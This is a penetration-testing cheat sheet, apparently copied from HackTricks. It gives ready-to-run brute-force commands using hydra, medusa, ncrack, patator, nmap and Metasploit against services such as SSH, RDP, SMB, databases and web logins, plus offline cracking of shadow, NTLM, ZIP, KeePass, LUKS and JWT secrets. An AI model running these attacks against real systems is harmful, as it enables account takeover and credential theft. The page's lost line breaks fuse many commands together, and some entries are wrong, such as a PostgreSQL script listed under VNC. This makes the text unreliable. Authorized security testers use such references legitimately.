Brute Force - CheatSheet

https://book.hacktricks.xyz/brute-force

Wait a second, have you tried to use default credentials??

Search in google for default credentials of the technology that is being used, or try this links:

Service

Ordered alphabetically by service name.

AFP

nmap -p 548 --script afp-brute <IP>msf> use auxiliary/scanner/afp/afp_loginmsf> set BLANK_PASSWORDS truemsf> set USER_AS_PASS truemsf> set PASS_FILE <PATH_PASSWDS>msf> set USER_FILE <PATH_USERS>msf> run

AJP

nmap --script ajp-brute -p 8009 <IP>

Cassandra

nmap --script cassandra-brute -p 9160 <IP>

CouchDB

msf> use auxiliary/scanner/couchdb/couchdb_login

FTP

hydra -l root -P passwords.txt [-t 32] <IP> ftpncrack -p 21 --user root -P passwords.txt <IP> [-T 5]medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp

HTTP Generic Brute

HTTP Basic Auth

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/medusa -h <IP> -u <username> -P  <passwords.txt> -M  http -m DIR:/path/to/auth -T 10

HTTP - Post Form

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V

For https you have to change from "http-post-form" to "https-post-form"

HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle

cmsmap -f W/J/D/M -u a -p a https://wordpress.com

IMAP

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -Vhydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -Vnmap -sV --script imap-brute -p <PORT> <IP>

IRC

nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>

ISCSI

nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>

LDAP

nmap --script ldap-brute -p 389 <IP>

Mongo

nmap -sV --script mongodb-brute -n -p 27017 <IP>use auxiliary/scanner/mongodb/mongodb_login

MySQL

hydra -L usernames.txt -P pass.txt <IP> mysqlmsf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false

OracleSQL

patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017./odat.py passwordguesser -s $SERVER -d $SID./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt#msf1msf> use admin/oracle/oracle_loginmsf> set RHOSTS <IP>msf> set RPORT 1521msf> set SID <SID>#msf2, this option uses nmap and it fails sometimes for some reasonmsf> use scanner/oracle/oracle_loginmsf> set RHOSTS <IP>msf> set RPORTS 1521msf> set SID <SID>#nmap fails sometimes for some reson executing this scriptnmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>

In order to use oracle_login with patator you need to install:

pip3 install cx_Oracle --upgrade

Offline OracleSQL hash bruteforce (versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3):

 nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30

POP

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -Vhydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V

PostgreSQL

hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgresmedusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgresncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP>:5432patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txtuse auxiliary/scanner/postgres/postgres_loginnmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>

PPTP

cat rockyou.txt | thc-pptp-bruter –u <Username> <IP>

RDP

ncrack -vv --user <User> -P pwds.txt rdp://<IP>hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>

Redis

msf> use auxiliary/scanner/redis/redis_loginnmap --script redis-brute -p 6379 <IP>hydra –P /path/pass.txt <IP> redis

Rexec

hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V

Rlogin

hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V

Rsh

hydra -L <Username_list> rsh://<Victim_IP> -v -V

http://pentestmonkey.net/tools/misc/rsh-grind

Rsync

nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>

RTSP

hydra -l root -P passwords.txt <IP> rtsp

SNMP

msf> use auxiliary/scanner/snmp/snmp_loginnmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp_onesixtyone.txt <IP>hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp

SMB

nmap --script smb-brute -p 445 <IP>hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1

SMTP

hydra -l <username> -P /path/to/passwords.txt <IP> smtp -Vhydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL

SQL Server

#Use the NetBIOS name of the machine as domainhydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssqlmedusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssqlnmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be carefull with the number of password in the list, this could block accountsmsf> use auxiliary/scanner/mssql/mssql_login #Be carefull, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT

SSH

hydra -l root -P passwords.txt [-t 32] <IP> sshncrack -p 22 --user root -P passwords.txt <IP> [-T 5]medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh

Telnet

hydra -l root -P passwords.txt [-t 32] <IP> telnetncrack -p 23 --user root -P passwords.txt <IP> [-T 5]medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet

VNC

hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vncmedusa -h <IP> –u root -P /root/Desktop/pass.txt –M vncncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>Tpatator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0use auxiliary/scanner/vnc/vnc_loginnmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>

Local

Online cracking databases

https://www.onlinehashcrack.com/ (Hashes, WPA2 captures, and archives MSOffice, ZIP, PDF...)
https://gpuhash.me/ (Hashes and file hashes)
https://hashkiller.co.uk/Cracker (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512)

Check this out before trying to bruteforce a Hash.

Generic

Hash-identifier

John

john --rule --wordlist=/usr/share/wordlists/rockyou.txt file_with_hash.txt

unshadow

unshadow passwd.txt shadow.txt > tojohn.txt

ZIP

fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip

zip2john file.zip > zip.johnjohn zip.john

7z

cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z

#Download and install requirements for 7z2johnwget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.plapt-get install libcompress-raw-lzma-perl./7z2john.pl file.7z > 7zhash.john

PDF

apt-get install pdfcrackpdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt#pdf2john didnt worked well, john didnt know which hash type was# To permanently decrypt the pdfsudo apt-get install qpdfqpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf

JWT

git clone https://github.com/Sjord/jwtcrack.gitcd jwtcrack#Bruteforce using crackjwt.pypython crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt#Bruteforce using johnpython jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.johnjohn jwt.john #It does not work with Kali-John

NTLM cracking

Format:USUARIO:ID:HASH_LM:HASH_NT:::jhon --wordlist=/usr/share/wordlists/rockyou.txt --fomrat=NT file_NTLM.hasheshashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot

Keepass

sudo apt-get install -y kpcli #Install keepass tools like keepass2johnkeepass2john file.kdbx > hash #The keepass is only using passwordkeepass2john -k <file-password> file.kdbx > hash # The keepas is also using a file as a needed credential#The keepass can use password and/or a file as credentials, if it is using both you need to provide them to keepass2johnjohn --wordlist=/usr/share/wordlists/rockyou.txt hash

Lucks image

Method 1

Install: https://github.com/glv2/bruteforce-luks

bruteforce-luks -f ./list.txt ./backup.imgcryptsetup luksOpen backup.img mylucksopenls /dev/mapper/ #You should find here the image mylucksopenmount /dev/mapper/mylucksopen /mnt

Method 2

cryptsetup luksDump backup.img #Check that the payload offset is set to 4096dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1hashcat -m 14600 luckshash cryptsetup luksOpen backup.img mylucksopenls /dev/mapper/ #You should find here the image mylucksopenmount /dev/mapper/mylucksopen /mnt

Mysql

#John hash format<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d

Hash examples: https://openwall.info/wiki/john/sample-hashes

Hash-identifier

Crunch

crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabetcrunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)@ Lower case alpha characters, Upper case alpha characters% Numeric characters^ Special characters including spaccrunch 6 8 -t ,@@^^%%

Cewl

cewl --with-numbers -d 2 -m 5 -w words.txt http://$ip/

John mutation

Read /etc/john/john.conf and configure it

john --wordlist=words.txt --rules --stdout > w_mutated.txtjohn --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules

Hashcat

hashcat --example-hashes | grep -B1 -A2 "NTLM"

Cracking Linux Hashes - /etc/shadow file

 500 | md5crypt $1$, MD5(Unix)                          | Operating-Systems3200 | bcrypt $2*$, Blowfish(Unix)                      | Operating-Systems7400 | sha256crypt $5$, SHA256(Unix)                    | Operating-Systems1800 | sha512crypt $6$, SHA512(Unix)                    | Operating-Systems

Cracking Windows Hashes

3000 | LM                                               | Operating-Systems1000 | NTLM                                             | Operating-Systems

Cracking Common Application Hashes

  900 | MD4                                              | Raw Hash    0 | MD5                                              | Raw Hash 5100 | Half MD5                                         | Raw Hash  100 | SHA1                                             | Raw Hash10800 | SHA-384                                          | Raw Hash 1400 | SHA-256                                          | Raw Hash 1700 | SHA-512                                          | Raw Hash

Last updated 5 years ago

hashtagService

hashtagAFP

hashtagAJP

hashtagCassandra

hashtagCouchDB

hashtagFTP

hashtagHTTP Generic Brute

hashtagHTTP Basic Auth

hashtagHTTP - Post Form

hashtagHTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle

hashtagIMAP

hashtagIRC

hashtagISCSI

hashtagLDAP

hashtagMongo

hashtagMySQL

hashtagOracleSQL

hashtagPOP

hashtagPostgreSQL

hashtagPPTP

hashtagRDP

hashtagRedis

hashtagRexec

hashtagRlogin

hashtagRsh

hashtagRsync

hashtagRTSP

hashtagSNMP

hashtagSMB

hashtagSMTP

hashtagSQL Server

hashtagSSH

hashtagTelnet

hashtagVNC

hashtagLocal

hashtagOnline cracking databases

hashtagGeneric

hashtagHash-identifier

hashtagJohn

hashtagunshadow

hashtagZIP

hashtag7z

hashtagPDF

hashtagJWT

hashtagNTLM cracking

hashtagKeepass

hashtagLucks image

hashtagMethod 1

hashtagMethod 2

hashtagMysql

hashtagHash-identifier

hashtagCrunch

hashtagCewl

hashtagJohn mutation

hashtagHashcat

Service

AFP

AJP

Cassandra

CouchDB

FTP

HTTP Generic Brute

HTTP Basic Auth

HTTP - Post Form

HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle

IMAP

IRC

ISCSI

LDAP

Mongo

MySQL

OracleSQL

POP

PostgreSQL

PPTP

RDP

Redis

Rexec

Rlogin

Rsh

Rsync

RTSP

SNMP

SMB

SMTP

SQL Server

SSH

Telnet

VNC

Local

Online cracking databases

Generic

Hash-identifier

John

unshadow

ZIP

7z

PDF

JWT

NTLM cracking

Keepass

Lucks image

Method 1

Method 2

Mysql

Hash-identifier

Crunch

Cewl

John mutation

Hashcat